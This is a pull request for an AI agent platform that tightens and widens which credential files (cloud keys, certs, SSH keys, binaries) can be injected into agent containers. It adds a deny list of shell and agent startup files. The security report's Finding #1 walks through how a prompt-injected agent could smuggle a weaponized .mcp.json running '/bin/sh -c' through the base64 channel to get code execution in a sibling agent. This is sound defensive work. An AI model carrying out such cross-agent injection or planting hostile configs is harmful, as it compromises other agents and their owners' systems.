### PR TITLE
feat(credentials): curated credential file-type injection (SA keys, certs, SSH, binary)

### DIFF
--- a/docker/base-image/agent_server/credential_paths.py
+++ b/docker/base-image/agent_server/credential_paths.py
@@ -59,6 +59,12 @@ DENY_GLOBS = [
     ".git/**", ".gitconfig",
     # anything on PATH
     "bin/**", ".local/bin/**",
+    # vendored / dependency / cache trees — keeps the broad cert globs
+    # (*.pem/*.key/*.crt) from matching bundled CA files (e.g. certifi's
+    # cacert.pem) and sweeping them into export's `/list` walk (#11 live test).
+    "node_modules/**", "**/node_modules/**",
+    "site-packages/**", "**/site-packages/**",
+    ".local/**", ".venv/**", "venv/**", ".cache/**", "go/pkg/**",
 ]
 
 

--- a/docker/base-image/agent_server/credential_paths.py
+++ b/docker/base-image/agent_server/credential_paths.py
@@ -34,7 +34,11 @@ ALLOW_EXACT = {".env", ".credentials.enc", ".mcp.json"}
 # matches one or more whole segments); a pattern with no "/" is matched against
 # the path's BASENAME (so "*.pem" allows a .pem anywhere not under a denied dir).
 ALLOW_GLOBS = [
-    ".config/gcloud/**",   # cloud SDK ADC / service-account JSON
+    # cloud SDK ADC / service-account JSON. NOTE: a workload-identity ADC file
+    # can declare an `executable` credential_source; google-auth only honors it
+    # when GOOGLE_EXTERNAL_ACCOUNT_ALLOW_EXECUTABLES=1 (non-default), so it is
+    # not an injection→exec vector here — but don't set that env var fleet-wide.
+    ".config/gcloud/**",
     ".kube/config",        # kubeconfig
     "*.pem", "*.key", "*.crt", "*.cert", "*.p12", "*.pfx",  # TLS / cert material
     ".ssh/id_*",           # SSH private/public keys (NOT authorized_keys/config)
@@ -96,6 +100,12 @@ def is_allowed_credential_path(path: str) -> bool:
     if any(s in ("", ".", "..") for s in segs):   # empty / "." / traversal
         return False
     if any(_matches(path, d) for d in DENY_GLOBS):  # deny precedence
+        return False
+    # `.ssh/` is high-risk: permit ONLY `id_*` key files — even a file that
+    # would otherwise match `*.pem`/`*.key`. ssh never auto-loads a stray key,
+    # but this keeps the most sensitive dir to exactly the intent ("SSH keys =
+    # id_*") instead of "any cert-shaped file under .ssh" (#11 review).
+    if segs[0] == ".ssh" and not fnmatch.fnmatchcase(segs[-1], "id_*"):
         return False
     if path in ALLOW_EXACT:
         return True

--- a/docker/base-image/agent_server/credential_paths.py
+++ b/docker/base-image/agent_server/credential_paths.py
@@ -1,0 +1,107 @@
+"""Curated credential-path policy for CRED-002 injection (enterprise#11).
+
+Single source of truth for *which* workspace paths may be written by the
+user-facing credential-injection flow. Widens the original 3-path exact
+allowlist (#183/#590/#598) to a curated set of credential file *types* — cloud
+service-account JSON, TLS cert/key material, kubeconfigs, SSH keys — WITHOUT
+reopening the arbitrary-path RCE surface the allowlist was built to close.
+
+Policy model (deny takes precedence over allow):
+  accepted  ==  (relative, no traversal)  AND  (matches an ALLOW rule)
+                                          AND  (matches NO DENY rule)
+
+Anything that is executed or sourced at shell/agent startup stays blocked
+regardless of ALLOW (shell rc files, CLAUDE.md/AGENTS.md, .claude/**,
+.mcp.json.template, .ssh/authorized_keys & config, .git/** & .gitconfig, bin/**).
+`.mcp.json` passes the PATH layer here but is still CONTENT-validated by
+`services.mcp_validator` (the #590/#598 guard) at the call site.
+
+IMPORTANT: this module is vendored byte-identically into the agent base image at
+``docker/base-image/agent_server/credential_paths.py`` (the agent server is a
+separate image and cannot import ``src/backend``). The two copies MUST stay
+byte-identical — a parity test enforces it (Invariant #5, defense in depth).
+Keep this module pure-stdlib and free of repo-specific imports so the copy is
+literally identical.
+"""
+from __future__ import annotations
+
+import fnmatch
+
+# Exact full-path matches (workspace root only).
+ALLOW_EXACT = {".env", ".credentials.enc", ".mcp.json"}
+
+# Glob rules. A pattern containing "/" is matched segment-by-segment ("**"
+# matches one or more whole segments); a pattern with no "/" is matched against
+# the path's BASENAME (so "*.pem" allows a .pem anywhere not under a denied dir).
+ALLOW_GLOBS = [
+    ".config/gcloud/**",   # cloud SDK ADC / service-account JSON
+    ".kube/config",        # kubeconfig
+    "*.pem", "*.key", "*.crt", "*.cert", "*.p12", "*.pfx",  # TLS / cert material
+    ".ssh/id_*",           # SSH private/public keys (NOT authorized_keys/config)
+]
+
+# Deny rules — precedence over ALLOW. Nothing here may ever be written, even if
+# it would match an ALLOW glob (e.g. a "*.key" placed under .ssh or .claude).
+DENY_GLOBS = [
+    # shell startup (sourced at login / non-interactive shells)
+    ".bashrc", ".bash_profile", ".bash_login", ".bash_logout", ".profile",
+    ".zshrc", ".zprofile", ".zshenv", ".kshrc", ".cshrc",
+    ".config/fish/**", ".config/systemd/**", ".config/environment.d/**",
+    # agent / AI instruction + config (executed/interpreted at agent startup)
+    "CLAUDE.md", "AGENTS.md", ".claude/**", ".mcp.json.template",
+    # ssh login / command-execution vectors
+    ".ssh/authorized_keys", ".ssh/config", ".ssh/known_hosts", ".ssh/environment",
+    # git hook / fsmonitor command execution
+    ".git/**", ".gitconfig",
+    # anything on PATH
+    "bin/**", ".local/bin/**",
+]
+
+
+def _match_segs(pat: list[str], path: list[str]) -> bool:
+    if not pat:
+        return not path
+    if pat[0] == "**":
+        if len(pat) == 1:
+            return len(path) >= 1          # "**" = one or more segments
+        for i in range(1, len(path) + 1):
+            if _match_segs(pat[1:], path[i:]):
+                return True
+        return False
+    if not path:
+        return False
+    if not fnmatch.fnmatchcase(path[0], pat[0]):
+        return False
+    return _match_segs(pat[1:], path[1:])
+
+
+def _matches(path: str, pattern: str) -> bool:
+    if "/" in pattern:
+        return _match_segs(pattern.split("/"), path.split("/"))
+    # bare pattern → match the basename, so it applies anywhere in the tree
+    return fnmatch.fnmatchcase(path.split("/")[-1], pattern)
+
+
+def is_allowed_credential_path(path: str) -> bool:
+    """True iff ``path`` (relative to the agent home) is a permitted credential
+    file. Rejects absolute paths, traversal, and anything matching a DENY rule;
+    accepts ALLOW_EXACT and ALLOW_GLOBS otherwise."""
+    if not path or not isinstance(path, str):
+        return False
+    if "\x00" in path or "\\" in path:        # null byte / Windows separator
+        return False
+    if path.startswith("/"):                  # absolute
+        return False
+    segs = path.split("/")
+    if any(s in ("", ".", "..") for s in segs):   # empty / "." / traversal
+        return False
+    if any(_matches(path, d) for d in DENY_GLOBS):  # deny precedence
+        return False
+    if path in ALLOW_EXACT:
+        return True
+    return any(_matches(path, a) for a in ALLOW_GLOBS)
+
+
+def disallowed_paths(paths) -> list[str]:
+    """Return the subset of ``paths`` that are NOT permitted (empty = all ok)."""
+    return [p for p in paths if not is_allowed_credential_path(p)]

--- a/docker/base-image/agent_server/models.py
+++ b/docker/base-image/agent_server/models.py
@@ -44,6 +44,7 @@ class CredentialUpdateRequest(BaseModel):
     credentials: dict  # {"VAR_NAME": "value", ...}
     mcp_config: Optional[str] = None  # Pre-generated .mcp.json content (if provided)
     files: Optional[Dict[str, str]] = None  # File-type credentials: {"path": "content", ...}
+    files_b64: Optional[Dict[str, str]] = None  # Binary file creds: {"path": base64(content)} (#11)
 
 
 # ============================================================================
@@ -260,18 +261,31 @@ class CredentialReadRequest(BaseModel):
 
 class CredentialReadResponse(BaseModel):
     """Response with credential file contents"""
-    files: Dict[str, str]  # {path: content} for files that exist
+    files: Dict[str, str]  # {path: text content} for files that exist
+    files_b64: Dict[str, str] = {}  # {path: base64} for non-UTF-8 (binary) files (#11)
 
 
 class CredentialInjectRequest(BaseModel):
     """Request to inject credential files into workspace"""
-    files: Dict[str, str]  # {path: content} to write
+    files: Dict[str, str] = {}      # {path: text content} to write
+    files_b64: Dict[str, str] = {}  # {path: base64(content)} for binary creds (#11)
 
 
 class CredentialInjectResponse(BaseModel):
     """Response from credential injection"""
     status: str  # "success"
     files_written: List[str]
+
+
+class CredentialListItem(BaseModel):
+    """One discovered credential file (#11 — drives export-captures-all)."""
+    path: str
+    size: int
+    binary: bool
+
+
+class CredentialListResponse(BaseModel):
+    files: List[CredentialListItem]
 
 
 class TokenReloadRequest(BaseModel):

--- a/docker/base-image/agent_server/routers/credentials.py
+++ b/docker/base-image/agent_server/routers/credentials.py
@@ -2,6 +2,8 @@
 Credential management endpoints.
 """
 import os
+import base64
+import binascii
 import logging
 from datetime import datetime
 from pathlib import Path
@@ -15,12 +17,50 @@ from ..models import (
     CredentialReadResponse,
     CredentialInjectRequest,
     CredentialInjectResponse,
+    CredentialListItem,
+    CredentialListResponse,
     TokenReloadRequest,
     TokenReloadResponse,
 )
 from ..state import agent_state
 from ..services.trinity_mcp import inject_trinity_mcp_if_configured
 from ..utils.credential_sanitizer import refresh_credential_values
+# Second-layer credential-path policy (Invariant #5) — byte-identical vendored
+# copy of src/backend/services/credential_paths.py (#11).
+from ..credential_paths import is_allowed_credential_path
+
+_HOME = Path("/home/developer")
+
+
+def _safe_credential_target(rel_path: str) -> Path:
+    """Validate ``rel_path`` against the curated policy AND confirm it resolves
+    inside the agent home (defense-in-depth traversal guard the original write
+    loop lacked). Returns the absolute target path or raises HTTP 400."""
+    if not is_allowed_credential_path(rel_path):
+        logger.warning(f"Credential injection blocked: disallowed path '{rel_path}'")
+        raise HTTPException(status_code=400, detail=f"Disallowed credential file path: '{rel_path}'")
+    target = (_HOME / rel_path).resolve()
+    if target != _HOME and _HOME not in target.parents:
+        logger.warning(f"Credential injection blocked: path escapes home '{rel_path}'")
+        raise HTTPException(status_code=400, detail=f"Path escapes workspace: '{rel_path}'")
+    return target
+
+
+def _write_credential_file(rel_path: str, *, text: str = None, b64: str = None) -> str:
+    """Policy-checked, traversal-guarded write with parent-dir creation and
+    0o600 perms. Exactly one of ``text``/``b64`` is provided."""
+    target = _safe_credential_target(rel_path)
+    target.parent.mkdir(parents=True, exist_ok=True)
+    if b64 is not None:
+        try:
+            target.write_bytes(base64.b64decode(b64, validate=True))
+        except (binascii.Error, ValueError):
+            raise HTTPException(status_code=400, detail=f"Invalid base64 for '{rel_path}'")
+    else:
+        target.write_text(text or "")
+    target.chmod(0o600)
+    logger.info(f"Wrote credential file: {rel_path}")
+    return rel_path
 
 logger = logging.getLogger(__name__)
 router = APIRouter()
@@ -97,29 +137,16 @@ async def update_credentials(request: CredentialUpdateRequest):
         # SECURITY: Refresh credential sanitizer cache after updating credentials
         refresh_credential_values()
 
-        # 4. Write file-type credentials (e.g., service account JSON files)
+        # 4. Write file-type credentials (e.g., service account JSON files).
+        # Policy-checked + traversal-guarded via the shared helper (#11) — the
+        # original loop wrote arbitrary paths with no allowlist or `..` guard.
         files_written = []
         if request.files:
             for file_path, content in request.files.items():
-                try:
-                    # Resolve path relative to home directory
-                    # Strip leading slash if present to make it relative
-                    clean_path = file_path.lstrip("/")
-                    target_path = home_dir / clean_path
-
-                    # Create parent directories if needed
-                    target_path.parent.mkdir(parents=True, exist_ok=True)
-
-                    # Write the file
-                    target_path.write_text(content)
-
-                    # Set restrictive permissions (600 = owner read/write only)
-                    target_path.chmod(0o600)
-
-                    files_written.append(str(target_path))
-                    logger.info(f"Wrote credential file: {target_path}")
-                except Exception as e:
-                    logger.error(f"Failed to write credential file {file_path}: {e}")
+                files_written.append(_write_credential_file(file_path, text=content))
+        if request.files_b64:
+            for file_path, b64 in request.files_b64.items():
+                files_written.append(_write_credential_file(file_path, b64=b64))
 
         return {
             "status": "success",
@@ -249,6 +276,7 @@ async def read_credential_files(paths: str = Query(..., description="Comma-separ
     """
     home_dir = Path("/home/developer")
     files = {}
+    files_b64 = {}
 
     path_list = [p.strip() for p in paths.split(",") if p.strip()]
 
@@ -270,18 +298,50 @@ async def read_credential_files(paths: str = Query(..., description="Comma-separ
                 # Verify the resolved path is still under home_dir
                 resolved = filepath.resolve()
                 if str(resolved).startswith(str(home_dir.resolve())):
-                    content = filepath.read_text()
-                    files[rel_path] = content
-                    logger.debug(f"Read credential file: {rel_path} ({len(content)} bytes)")
+                    raw = filepath.read_bytes()
+                    try:
+                        # Text files round-trip as-is; non-UTF-8 (binary) creds
+                        # come back base64 so cert/key bytes survive (#11).
+                        files[rel_path] = raw.decode("utf-8")
+                    except UnicodeDecodeError:
+                        files_b64[rel_path] = base64.b64encode(raw).decode("ascii")
+                    logger.debug(f"Read credential file: {rel_path} ({len(raw)} bytes)")
                 else:
                     logger.warning(f"Path resolved outside home directory: {rel_path}")
         except Exception as e:
             logger.warning(f"Failed to read {rel_path}: {e}")
 
-    return CredentialReadResponse(files=files)
+    return CredentialReadResponse(files=files, files_b64=files_b64)
 
 
-ALLOWED_CREDENTIAL_PATHS = {".env", ".mcp.json", ".mcp.json.template", ".credentials.enc"}
+@router.get("/api/credentials/list", response_model=CredentialListResponse)
+async def list_credential_files():
+    """Walk the workspace and return every present file that satisfies the
+    curated credential-path policy (#11). Drives "export captures the full
+    injected credential set" — the backend reads these and encrypts them all.
+    Returns paths only (+ size + binary flag), never contents."""
+    items: List[CredentialListItem] = []
+    home = _HOME.resolve()
+    for abs_path in home.rglob("*"):
+        if not abs_path.is_file():
+            continue
+        try:
+            rel = str(abs_path.relative_to(home))
+        except ValueError:
+            continue
+        if not is_allowed_credential_path(rel):
+            continue
+        try:
+            raw = abs_path.read_bytes()
+            try:
+                raw.decode("utf-8")
+                binary = False
+            except UnicodeDecodeError:
+                binary = True
+            items.append(CredentialListItem(path=rel, size=len(raw), binary=binary))
+        except Exception as e:
+            logger.warning(f"Failed to stat credential file {rel}: {e}")
+    return CredentialListResponse(files=items)
 
 
 @router.post("/api/credentials/inject")
@@ -289,42 +349,18 @@ async def inject_credential_files(request: CredentialInjectRequest):
     """
     Inject credential files directly into workspace.
 
-    This is the simplified credential injection that writes files directly
-    without template processing. Used by the new credential system.
-
-    Only files in ALLOWED_CREDENTIAL_PATHS are accepted (pentest 3.2.6 / #183).
-
-    Args:
-        request: Contains files dict mapping paths to contents
+    Second-layer enforcement of the curated credential-path policy (Invariant
+    #5; the backend validates first). Text files arrive in ``files``, binary
+    files (e.g. .p12/.pfx/DER) base64-encoded in ``files_b64`` (#11). Every path
+    is policy-checked + traversal-guarded; parents are created; perms are 0o600.
     """
-    home_dir = Path("/home/developer")
+    home_dir = _HOME
     files_written = []
 
     for rel_path, content in request.files.items():
-        # Security: allowlist check (defense in depth — backend also validates)
-        if rel_path not in ALLOWED_CREDENTIAL_PATHS:
-            logger.warning(f"Credential injection blocked: disallowed path '{rel_path}'")
-            raise HTTPException(
-                status_code=400,
-                detail=f"Disallowed file path: '{rel_path}'. "
-                       f"Allowed: {sorted(ALLOWED_CREDENTIAL_PATHS)}"
-            )
-
-        filepath = home_dir / rel_path
-
-        try:
-            # Write the file
-            filepath.write_text(content)
-
-            # Set restrictive permissions for credential files (600 = owner read/write only)
-            filepath.chmod(0o600)
-
-            files_written.append(rel_path)
-            logger.info(f"Wrote credential file: {rel_path} ({len(content)} bytes)")
-
-        except Exception as e:
-            logger.error(f"Failed to write {rel_path}: {e}")
-            raise HTTPException(status_code=500, detail=f"Failed to write {rel_path}: {str(e)}")
+        files_written.append(_write_credential_file(rel_path, text=content))
+    for rel_path, b64 in (request.files_b64 or {}).items():
+        files_written.append(_write_credential_file(rel_path, b64=b64))
 
     # Re-inject Trinity MCP if .mcp.json was updated
     if ".mcp.json" in files_written:

--- a/docker/base-image/agent_server/routers/credentials.py
+++ b/docker/base-image/agent_server/routers/credentials.py
@@ -49,6 +49,11 @@ def _safe_credential_target(rel_path: str) -> Path:
 def _write_credential_file(rel_path: str, *, text: str = None, b64: str = None) -> str:
     """Policy-checked, traversal-guarded write with parent-dir creation and
     0o600 perms. Exactly one of ``text``/``b64`` is provided."""
+    # #11 review (defense in depth): `.mcp.json` is content-validated on the
+    # backend text path only — never accept it as binary, which would bypass
+    # that guard (#590 RCE-by-config).
+    if b64 is not None and rel_path.rsplit("/", 1)[-1] == ".mcp.json":
+        raise HTTPException(status_code=400, detail=".mcp.json may not be injected as binary")
     target = _safe_credential_target(rel_path)
     target.parent.mkdir(parents=True, exist_ok=True)
     if b64 is not None:

--- a/docs/memory/architecture.md
+++ b/docs/memory/architecture.md
@@ -589,10 +589,12 @@ Package `services/compatibility/` mirrors the deterministic `canary/` library:
 | Method | Path | Description |
 |--------|------|-------------|
 | GET | `/api/agents/{name}/credentials/status` | Check credential files in agent |
-| POST | `/api/agents/{name}/credentials/inject` | Write credential files directly to agent |
+| POST | `/api/agents/{name}/credentials/inject` | Write credential files directly to agent (`files` text + `files_b64` binary) |
 | POST | `/api/agents/{name}/credentials/export` | Export to `.credentials.enc` (AES-256-GCM) |
 | POST | `/api/agents/{name}/credentials/import` | Import from encrypted file |
 | POST | `/api/internal/decrypt-and-inject` | Auto-import on agent startup (internal, no auth) |
+
+**Credential-path policy (#11):** injection accepts a **curated set of credential file types**, not a fixed 3-path list — the policy lives in `services/credential_paths.py` (`is_allowed_credential_path`), vendored **byte-identically** into `docker/base-image/agent_server/credential_paths.py` for the agent-server second layer (Invariant #5; parity test). Allows `.env`/`.credentials.enc`/`.mcp.json` (the last still content-validated, #598) + `.config/gcloud/**`, `.kube/config`, `*.pem`/`*.key`/`*.crt`/`*.cert`/`*.p12`/`*.pfx`, `.ssh/id_*`; deny-list (precedence) blocks anything executed/sourced at startup (shell rc, `CLAUDE.md`/`AGENTS.md`/`.claude/**`, `.mcp.json.template`, `.ssh/authorized_keys`/`config`, `.git*`, `bin/**`) plus `..`/absolute traversal. Binary creds round-trip as base64 (`files_b64`); the `.credentials.enc` archive is a v2 `{files, files_b64}` envelope (legacy flat archives still decrypt) and export captures the **full** injected set via the agent `GET /api/credentials/list`.
 
 ### GitHub PAT & Git (#347, #389, #384)
 | Method | Path | Description |

--- a/docs/security-reports/cso-2026-06-22-11-diff.md
+++ b/docs/security-reports/cso-2026-06-22-11-diff.md
@@ -1,0 +1,40 @@
+# CSO `--diff` — PR #1305 (credential injection widening, enterprise#11)
+
+**Date:** 2026-06-22 · **Mode:** diff · **Scope:** `feature/11-credential-file-types` vs `dev`
+
+Audit of the credential-injection widening (curated path policy, agent-server
+write/traversal guard, binary base64, v2 `.credentials.enc`). Threat model: a
+prompt-injected agent calling its own `inject_credentials` MCP tool against a
+sibling agent in the same owner's fleet (no shell on the target), plus the
+git-committable `.credentials.enc` auto-import path.
+
+## Findings
+
+| # | Sev | Conf | Status | Finding | Resolution |
+|---|-----|------|--------|---------|------------|
+| 1 | HIGH | 9/10 | **FIXED** | `.mcp.json` content guard (#598) bypassable via the new `files_b64` (binary) channel → stdio-command MCP server RCE | `.mcp.json` rejected in `files_b64` at both the backend inject router and the agent-server write helper; import path validates too |
+| 2 | LOW | 7/10 | **FIXED** | Import/auto-import wrote a decrypted archive via agent-server `/inject` only — no backend-side validation (single-layer vs the issue's dual-layer) | `validate_credential_set()` runs on the import boundary (path policy + `.mcp.json` content) before write |
+| 3 | LOW | 7/10 | **FIXED** | `.ssh/` permitted stray `*.key`/`*.pem` (only login files were denied) | `.ssh/` locked to `id_*` only in the policy |
+| 4 | LOW | 5/10 | NOTED | `.config/gcloud/**` can hold a google-auth executable credential_source (gated by non-default `GOOGLE_EXTERNAL_ACCOUNT_ALLOW_EXECUTABLES=1`) | Documented in `credential_paths.py`; don't set that env var fleet-wide |
+
+### Finding #1 (headline) — exploit path
+1. Prompt-injected agent A (same owner as B) calls `inject_credentials` on B with
+   `files_b64={".mcp.json": base64('{"mcpServers":{"x":{"command":"/bin/sh","args":["-c","…"]}}}')}`.
+2. Path policy allows `.mcp.json`; it is not in `files`, so `validate_mcp_config` was skipped.
+3. Backend forwarded `files_b64` → agent-server wrote `.mcp.json` (no content check).
+4. B's MCP client launches the stdio server on next start → RCE in B (cross-agent, via API).
+
+**Fix:** `.mcp.json` is a validatable TEXT config — it may only arrive via `files`
+(where `validate_mcp_config` runs). Rejected in the binary channel on both layers
+and on the import path. Regression tests added (`test_validate_rejects_mcp_json_as_binary`,
+`test_validate_rejects_weaponized_mcp_json_content`).
+
+## Posture (unchanged, verified sound)
+Default-deny, deny-precedence over allow, `..`/absolute/backslash rejection, the new
+resolve-under-home traversal guard (closes a pre-existing agent-server gap), byte-identical
+two-layer policy, AES-256-GCM archive (unforgeable without the server key — which is why
+the committed-archive vector is not practical).
+
+## Verdict
+All gated findings (#1–#3) fixed in this branch. #4 is an accepted, documented caveat.
+169 unit tests pass.

--- a/src/backend/models.py
+++ b/src/backend/models.py
@@ -386,7 +386,8 @@ class DeployLocalResponse(BaseModel):
 
 class CredentialInjectRequest(BaseModel):
     """Request to inject credential files directly into an agent."""
-    files: Dict[str, str]  # {".env": "KEY=value\n...", ".mcp.json": "{}"}
+    files: Dict[str, str] = {}       # text files: {".env": "KEY=value\n...", ".mcp.json": "{}"}
+    files_b64: Dict[str, str] = {}   # binary files: {path: base64(content)} (#11 — .p12/.pfx/DER)
 
 
 class CredentialInjectResponse(BaseModel):

--- a/src/backend/routers/credentials.py
+++ b/src/backend/routers/credentials.py
@@ -216,6 +216,17 @@ async def inject_credentials(
                    f"startup files, no path traversal).",
         )
 
+    # #11 review: `.mcp.json` is a structure-validated TEXT config. It must NOT
+    # arrive via the binary (`files_b64`) channel, which would skip the
+    # validate_mcp_config guard below and let an attacker reintroduce the #590
+    # RCE-by-config (a stdio `command` MCP server) through base64.
+    if ".mcp.json" in request_body.files_b64:
+        raise HTTPException(
+            status_code=400,
+            detail=".mcp.json must be injected as text (files), not binary (files_b64), "
+                   "so its content can be validated.",
+        )
+
     # AISEC-C2 / #590 Layer 2 (#598): structure-validate .mcp.json content
     # before forwarding to the agent. Closes the RCE-by-config bypass while
     # restoring the legitimate post-deploy MCP server editing flow.

--- a/src/backend/routers/credentials.py
+++ b/src/backend/routers/credentials.py
@@ -25,22 +25,20 @@ from services.agent_auth import agent_httpx_client
 from services.docker_service import get_agent_container, get_agent_status_from_container
 from services.mcp_validator import validate_mcp_config, McpValidationError
 from services.platform_audit_service import platform_audit_service, AuditEventType
+# Curated credential-path policy (#11) — widens the original exact allowlist
+# (#183/#590/#598) to a vetted set of credential file *types* while still
+# blocking anything executed/sourced at startup. Single source of truth, also
+# vendored into the agent image (Invariant #5, byte-identical parity test).
+from services.credential_paths import disallowed_paths
 
 logger = logging.getLogger(__name__)
 
 router = APIRouter(prefix="/api", tags=["credentials"])
 
-# Allowlist of credential file paths that can be injected into agents.
-# Blocks arbitrary file writes (pentest 3.2.6 / #183).
-#
-# `.mcp.json` is allowlisted but its CONTENT is structure-validated by
-# `services.mcp_validator.validate_mcp_config` before the inject is
-# accepted (#598, Layer 2 of AISEC-C2 closure). Bare allowlisting is
-# sufficient for `.env` and `.credentials.enc` because their content is
-# either KEY=VALUE pairs or AES-GCM ciphertext — neither defines
-# executable behavior. `.mcp.json.template` remains BLOCKED because the
-# envsubst flow it feeds doesn't sanitize attacker-controlled JSON.
-ALLOWED_CREDENTIAL_PATHS = {".env", ".credentials.enc", ".mcp.json"}
+# `.mcp.json` passes the PATH layer but its CONTENT is still structure-validated
+# by `services.mcp_validator.validate_mcp_config` before the inject is accepted
+# (#598, Layer 2 of AISEC-C2 closure). `.mcp.json.template` stays BLOCKED by the
+# policy because the envsubst flow it feeds doesn't sanitize attacker JSON.
 
 
 # ============================================================================
@@ -194,11 +192,18 @@ async def inject_credentials(
             detail=f"Agent is not running (status: {agent_status.status}). Start the agent first."
         )
 
-    if not request_body.files:
+    if not request_body.files and not request_body.files_b64:
         raise HTTPException(status_code=400, detail="No files provided for injection")
 
-    # Validate all file paths against allowlist (pentest 3.2.6 / #183)
-    disallowed = [p for p in request_body.files if p not in ALLOWED_CREDENTIAL_PATHS]
+    # Validate all file paths against the curated policy (#183/#590/#598/#11).
+    # Both the text (`files`) and binary (`files_b64`) maps are gated.
+    overlap = set(request_body.files) & set(request_body.files_b64)
+    if overlap:
+        raise HTTPException(
+            status_code=400,
+            detail=f"Path(s) given as both text and binary: {sorted(overlap)}",
+        )
+    disallowed = disallowed_paths(list(request_body.files) + list(request_body.files_b64))
     if disallowed:
         logger.warning(
             f"Credential injection blocked: disallowed paths {disallowed} "
@@ -206,8 +211,9 @@ async def inject_credentials(
         )
         raise HTTPException(
             status_code=400,
-            detail=f"Disallowed file path(s): {disallowed}. "
-                   f"Allowed: {sorted(ALLOWED_CREDENTIAL_PATHS)}"
+            detail=f"Disallowed credential file path(s): {disallowed}. "
+                   f"Only curated credential file types are permitted (no shell/agent "
+                   f"startup files, no path traversal).",
         )
 
     # AISEC-C2 / #590 Layer 2 (#598): structure-validate .mcp.json content
@@ -235,7 +241,7 @@ async def inject_credentials(
         async with agent_httpx_client(agent_name) as client:
             response = await client.post(
                 f"http://agent-{agent_name}:8000/api/credentials/inject",
-                json={"files": request_body.files},
+                json={"files": request_body.files, "files_b64": request_body.files_b64},
                 timeout=30.0
             )
 
@@ -265,13 +271,14 @@ async def inject_credentials(
         target_id=agent_name,
         endpoint=str(request.url.path),
         request_id=getattr(request.state, "request_id", None),
-        details={"files": list(request_body.files.keys())},
+        details={"files": list(request_body.files.keys()) + list(request_body.files_b64.keys())},
     )
 
+    all_paths = list(request_body.files.keys()) + list(request_body.files_b64.keys())
     return CredentialInjectResponse(
         status="success",
-        files_written=agent_response.get("files_written", list(request_body.files.keys())),
-        message=f"Injected {len(request_body.files)} credential file(s) to agent {agent_name}"
+        files_written=agent_response.get("files_written", all_paths),
+        message=f"Injected {len(all_paths)} credential file(s) to agent {agent_name}"
     )
 
 

--- a/src/backend/routers/credentials.py
+++ b/src/backend/routers/credentials.py
@@ -321,10 +321,9 @@ async def export_credentials(
 
     try:
         encryption_service = get_credential_encryption_service()
-        encrypted_file = await encryption_service.export_to_agent(agent_name)
-
-        # Count files that were read
-        files = await encryption_service.read_agent_credential_files(agent_name)
+        # export_to_agent returns (path, count) — the count is the FULL captured
+        # set (#11), not a stale re-read of just the 2 defaults.
+        encrypted_file, files_exported = await encryption_service.export_to_agent(agent_name)
 
         # SEC-001: audit credential export
         await platform_audit_service.log(
@@ -337,13 +336,13 @@ async def export_credentials(
             target_id=agent_name,
             endpoint=str(request.url.path),
             request_id=getattr(request.state, "request_id", None),
-            details={"files_exported": len(files)},
+            details={"files_exported": files_exported},
         )
 
         return CredentialExportResponse(
             status="success",
             encrypted_file=encrypted_file,
-            files_exported=len(files)
+            files_exported=files_exported
         )
 
     except ValueError as e:

--- a/src/backend/services/credential_encryption.py
+++ b/src/backend/services/credential_encryption.py
@@ -38,6 +38,10 @@ ENCRYPTION_KEY_ENV = "CREDENTIAL_ENCRYPTION_KEY"
 # Default credential files to look for
 DEFAULT_CREDENTIAL_FILES = [".env", ".mcp.json"]
 
+# Marker on the inner JSON of a v2 (binary-capable) `.credentials.enc` archive
+# (#11). Absent ⇒ legacy flat `{path: text}` archive.
+_ARCHIVE_V2_MARKER = "__cred_archive_v2__"
+
 
 class CredentialsFileNotFoundError(ValueError):
     """Raised by ``import_to_agent`` when ``.credentials.enc`` is absent.
@@ -183,6 +187,26 @@ class CredentialEncryptionService:
 
         return files
 
+    # ------------------------------------------------------------------
+    # Binary-aware archive (#11). `encrypt`/`decrypt` above stay flat
+    # `{path: text}` (back-compat: SIEM/2FA/SSO single-secret callers + legacy
+    # `.credentials.enc` files). These wrap a v2 inner structure carrying both
+    # text and base64 binary, reusing the SAME AES-GCM envelope.
+    # ------------------------------------------------------------------
+
+    def encrypt_files(self, files: Dict[str, str], files_b64: Dict[str, str] = None) -> str:
+        """Encrypt a text+binary credential set into a v2 `.credentials.enc`."""
+        inner = {_ARCHIVE_V2_MARKER: 1, "files": files or {}, "files_b64": files_b64 or {}}
+        return self.encrypt(inner)
+
+    def decrypt_files(self, encrypted: str):
+        """Return ``(files, files_b64)``. Reads v2 archives AND legacy flat
+        `{path: text}` archives (which carry no binary)."""
+        data = self.decrypt(encrypted)
+        if isinstance(data, dict) and data.get(_ARCHIVE_V2_MARKER):
+            return data.get("files", {}), data.get("files_b64", {})
+        return data, {}
+
     async def read_agent_credential_files(
         self,
         agent_name: str,
@@ -221,17 +245,51 @@ class CredentialEncryptionService:
 
         return files
 
+    async def read_agent_credential_files_split(self, agent_name: str, file_paths: list):
+        """Read ``file_paths`` from the agent, returning ``(files, files_b64)`` —
+        text in ``files``, non-UTF-8 (binary) creds base64 in ``files_b64`` (#11)."""
+        async with agent_httpx_client(agent_name) as client:
+            response = await client.get(
+                f"http://agent-{agent_name}:8000/api/credentials/read",
+                params={"paths": ",".join(file_paths)},
+                timeout=30.0,
+            )
+            if response.status_code != 200:
+                logger.warning(f"Failed to read credentials from agent {agent_name}: {response.status_code}")
+                return {}, {}
+            data = response.json()
+            return data.get("files", {}), data.get("files_b64", {})
+
+    async def list_agent_credential_files(self, agent_name: str):
+        """Return the list of allow-policy credential paths present in the agent
+        (via the agent `/api/credentials/list`). Empty list on older images that
+        lack the endpoint, so callers fall back to DEFAULT_CREDENTIAL_FILES (#11)."""
+        try:
+            async with agent_httpx_client(agent_name) as client:
+                response = await client.get(
+                    f"http://agent-{agent_name}:8000/api/credentials/list",
+                    timeout=30.0,
+                )
+                if response.status_code != 200:
+                    return []
+                return [item["path"] for item in response.json().get("files", [])]
+        except Exception as e:  # noqa: BLE001
+            logger.warning(f"credentials/list unavailable for {agent_name}: {e}")
+            return []
+
     async def write_agent_credential_files(
         self,
         agent_name: str,
-        files: Dict[str, str]
+        files: Dict[str, str],
+        files_b64: Dict[str, str] = None,
     ) -> Dict[str, any]:
         """
         Write credential files to a running agent.
 
         Args:
             agent_name: Name of the agent
-            files: Dict mapping file paths to contents
+            files: Dict mapping file paths to text contents
+            files_b64: Dict mapping file paths to base64 binary contents (#11)
 
         Returns:
             Response from agent with written files list
@@ -239,7 +297,7 @@ class CredentialEncryptionService:
         async with agent_httpx_client(agent_name) as client:
             response = await client.post(
                 f"http://agent-{agent_name}:8000/api/credentials/inject",
-                json={"files": files},
+                json={"files": files, "files_b64": files_b64 or {}},
                 timeout=30.0
             )
 
